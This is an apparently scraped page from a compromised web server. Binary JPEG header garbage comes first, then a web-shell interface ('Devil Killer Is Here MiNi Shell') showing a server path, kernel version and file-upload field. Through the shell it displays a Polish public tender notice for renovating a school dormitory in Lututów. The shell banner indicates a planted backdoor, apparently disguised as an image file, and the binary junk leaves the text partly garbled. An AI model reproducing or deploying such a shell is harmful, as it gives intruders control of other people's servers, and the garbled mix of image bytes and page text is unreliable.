JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250618/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250618/0028577901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Prace remontowe w budynku internatu na III piętrze <br/>oraz wejść dla mieszkańców budynku w Zespole Szkół Centrum <br/>Kształcenia Rolniczego w Lututowie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO W LUTUTOWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO W LUTUTOWI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000096483</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Klonowska, 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lututów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-360</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">043 8714047</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zsrlut@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsrlututow.inetnetdsl.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Prace remontowe w budynku internatu na III piętrze <br/>oraz wejść dla mieszkańców budynku w Zespole Szkół Centrum <br/>Kształcenia Rolniczego w Lututowie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d4364001-afc7-4831-b6cc-3223cda3ba3b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00285779</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00091742/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 PRACE REMONTOWE W BUDYNKU INTERNATU NA III PIĘTRZE ORAZ WEJSĆ DLA MIESZKAŃCÓW BUDYNKU W ZSCKR LUTUTÓW</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zsrlututow/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platformy zakupowej: https://platformazakupowa.pl/pn/zsrlututow<br/>lub<br/> poczty elektronicznej: zsrlutmagazyn2@wp.pl. <br/>Zamawiający przekazuje dokumenty na adres poczty elektronicznej wskazany w formularzu ofertowym Wykonawcy, na co Wykonawca wyraża zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas trwania postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w formularzu ofertowym zostały doręczone skutecznie a wykonawca zapoznał się z ich treścią.<br/>Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz (Dz. U. z 2020 poz. 2415).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">13.3. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w formatach danych określonych w przepisach wydanych na <br/>podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności <br/>podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2024 r. poz. 1557), z <br/>zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, z <br/>uwzględnieniem rodzaju przekazywanych danych. Zamawiający preferuje w <br/>szczególności następujące formaty przesłanych danych: .pdf, .docx, .zip (Zamawiający dopuszcza także format .rar).Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zsrlututow/proceedings w zakładce postępowania. 11.2. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym, a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza , opcjonalnie , komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z wykonawcami: zsrlut@wp.pl, zsrlutmagazyn2@wp.pl. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest Strona 22 z 39 Specyfikacja Warunków Zamówienia (SWZ) konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów <br/>z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania <br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz <br/>środków komunikacji elektronicznej w postępowaniu o udzieleniezamówienia <br/>publicznego lub konkursie (Dz. U. z 2020 poz. 2452) określa niezbędne <br/>wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: <br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, <br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB <br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, <br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet <br/>Explorer minimalnie wersja 10 0., <br/>d) włączona obsługa JavaScript, <br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format <br/>plików .pdf, <br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji <br/>sieciowej - kodowanie UTF8, <br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę <br/>oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera <br/>synchronizowanego z zegarem Głównego Urzędu Miar. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia <br/>publicznego: <br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w <br/>Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce <br/>„Regulamin&#34; oraz uznaje go za wiążący, <br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod <br/>linkiem.https;//drive.gogle.com/file/d/1KdDttbBeiNWt4q4sIS4t76IZVKPbkyD/view.Z uwagi na ograniczoną liczbę znaków ciag dalszy w sekcji IX -Pozostałe informacje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) <br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich <br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie <br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, <br/>że: <br/>1) jest administratorem danych osobowych Wykonawcy oraz osób, których dane <br/>Wykonawca przekazał w niniejszym postępowaniu; <br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego na <br/>zadanie pn.: „Prace remontowe w budynku internatu na III piętrze <br/>oraz wejść dla mieszkańców budynku w Zespole Szkół Centrum Kształcenia <br/>Rolniczego w Lututowie” prowadzonym w trybie podstawowym; <br/>3) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 <br/>ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. <br/>poz. 1320), dalej „ustawa Pzp”; <br/>4) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy <br/>Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, <br/>w sposób gwarantujący jego nienaruszalność. <br/>5) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go <br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, <br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>6) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w <br/>sposób zautomatyzowany, stosownie do art. 22 RODO; <br/>7) Wykonawca posiada: <br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących <br/>Wykonawcy; <br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich <br/>zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia <br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą <br/>Pzp oraz nie narusza integralności protokołu oraz jego załączników; <br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy <br/>Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy <br/>RODO; <br/>8) Wykonawcy nie przysługuje: <br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/>osobowych; <br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych <br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych <br/>Wykonawcy jest art. 6 ust. 1 lit. c RODO. <br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO, <br/>wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, <br/>której dane dotyczą, wskazania dodatkowych informacji mających na celu <br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o <br/>udzielenie zamówienia publicznego lub konkursu. <br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub <br/>uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować <br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani <br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą. <br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza <br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie <br/>zamówienia publicznego lub konkursu. <br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie <br/>Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 RODO, są <br/>wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">20/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są prace remontowe w budynku internatu na III <br/>piętrze oraz wejść dla mieszkańców budynku w Zespole Szkół Centrum <br/>Kształcenia Rolniczego w Lututowie. <br/>4.2. Przedmiotem zamówienia jest remont istniejących schodów i ich otoczenia przy wejściu od strony zachodniej, południowej i północnej na terenie Zespołu Szkół Centrum Kształcenia Rolniczego w Lututowie polegający na: wykonaniu <br/>utwardzeń, wykonaniu schodów z betonu architektonicznego, montażu balustrady, rozbiórka istniejących utwardzeń. Prace będą wykonywane w budynku znajdującym się na działce o nr ewidencyjnym 369/4, 369/5, 369/21 – obręb geodezyjny Lututów. Prace remontowe dotyczą również remontu korytarza na III piętrze internatu szkoły. Prace polegają na rozbiórce ścianki z luksferów i zamurowaniu otworu, wykonanie sufitów podwieszanych o konstrukcji metalowej z wypełnieniem kasetonami, montaż opraw oświetleniowych w sufitach podwieszanych, wykonanie zabudowy g-k oraz montaż listwy oświetleniowej typu LED w zabudowie, malowanie ścian farbami emulsyjnymi, wykonanie tynku mozaikowego do wysokości 150 cm, skucie dotychczasowych płytek z posadzki, wyrównanie posadzki, montaż posadzki z płytek ceramicznych, montaż nakładki na parapet z PCV szer. 25 cm, wymiana niektórych skrzydeł drzwiowych, montaż okładziny drewnopodobnej o szer. 20 cm z atestem p.poż. Przy drzwiach z numerem pokoju z pleksi, wymiana skrzynki hydrantowej wpuszczonej na skrzynkę w kolorze białym, wymiana skrzynki na gaśnicę p.poż na skrzynkę w kolorze białym, wykonanie przełożenia kamer, czujników, zaślepienie gniazd wtyczkowych.<br/>4.4. Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku Nr 1 do SWZ. Składają się na niego następujące dokumenty:<br/>1) Dokumentacja projektowa w tym: projekt architektoniczno-budowlany, projekt zagospodarowania terenu, projekt techniczny/wykonawczy branży budowlanej, projekt techniczny/wykonawczy branży elektrycznej, informacja BIOZ<br/>2) Specyfikacje techniczne wykonania i odbioru robót budowlanych branży budowlana i elektrycznej (STWiORB),<br/>3) Przedmiary robót (branża budowlana i elektryczna). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45422100-2 - Stolarka drewniana</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie <br/>następujących kryteriów oceny ofert: <br/>Lp. <br/>Nazwa kryterium <br/>1 Cena (C) <br/>Znaczenie kryterium (w %) <br/>60 <br/>Długość okresu gwarancji na wykonane <br/>2 <br/>roboty budowlane oraz wbudowane <br/>materiały i zamontowane urządzenia (G) <br/>40 <br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych <br/>kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt. <br/>17.2. Punkty za kryterium „Cena” zostaną obliczone według wzoru: <br/>Cn <br/>PC = ------- x 60 pkt <br/>Cb <br/>gdzie, <br/>PC - ilość punktów za kryterium cena, <br/>Cn - najniższa cena ofertowa spośród ofert nieodrzuconych, <br/>Cb – cena oferty badanej. <br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe <br/>oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny <br/>odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony <br/>do dwóch miejsc po przecinku. <br/>17.3. Kryterium „Długość okresu gwarancji na wykonane roboty budowlane oraz <br/>wbudowane materiały i zamontowane urządzenia” liczone w okresach <br/>miesięcznych: <br/>W przypadku zaoferowania minimalnej długości okresu gwarancji tj. 36 miesięcy, <br/>Wykonawca otrzyma zero (0) punktów. <br/>W przypadku zaoferowania maksymalnej długości okresu gwarancji tj. 60 <br/>miesięcy, Wykonawca otrzyma czterdzieści (40) punktów. <br/>W przypadku zaoferowania gwarancji pomiędzy 36 a 60 miesięcy Wykonawca <br/>otrzyma pkt wg wzoru: <br/>Go - Gmin. <br/>PG = <br/>gdzie: <br/>PG - ---------------- x 40 pkt <br/>Gmax. - Gmin. <br/>wartość punktowa, którą należy wyznaczyć, <br/>G max. - <br/>G min. - <br/>Go - <br/>60 miesięcy, <br/>36 miesięcy, <br/>okres gwarancji podany w badanej ofercie. <br/>Uwaga: <br/>Zamawiający określa minimalną oraz maksymalną długość okresu gwarancji, w <br/>przedziale od 36 miesięcy do 60 miesięcy. W przypadku zaoferowania przez <br/>Wykonawcę długości gwarancji krótszego niż 36 m-cy, Zamawiający <br/>ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w <br/>ofercie oferowanego okresu gwarancji Zamawiający przyjmie, że <br/>Wykonawca nie oferuje gwarancji, i ofertę odrzuci. Wykonawca może <br/>zaproponować długość okresu gwarancji dłuższy niż wyznaczony maksymalny <br/>60 miesięcy, jednak w tym przypadku Zamawiający przyjmie do obliczeń <br/>wartość 60 m-cy - najdłuższy przyjęty w kryterium oceny ofert „Długość <br/>okresu gwarancji na wykonane roboty budowlane oraz wbudowane <br/>materiały i zamontowane urządzenia”. Wykonawcy oferują długości <br/>okresu gwarancji w pełnych miesiącach (w przedziale od 36 do 60 <br/>miesięcy). <br/>17.4. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą <br/>ilość punktów (PO) obliczoną na podstawie wzoru: <br/>PO = PC + PG <br/>gdzie: <br/>PO - łączna ilość punktów oferty ocenianej, <br/>PC - liczba punktów uzyskanych w kryterium „Cena”, <br/>Strona 31 z 39 <br/>Specyfikacja Warunków Zamówienia (SWZ) <br/>PG - liczba punktów uzyskanych w kryterium „Długość okresu gwarancji na <br/>wykonane roboty budowlane oraz wbudowane materiały i zamontowane <br/>urządzenia&#34;.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: 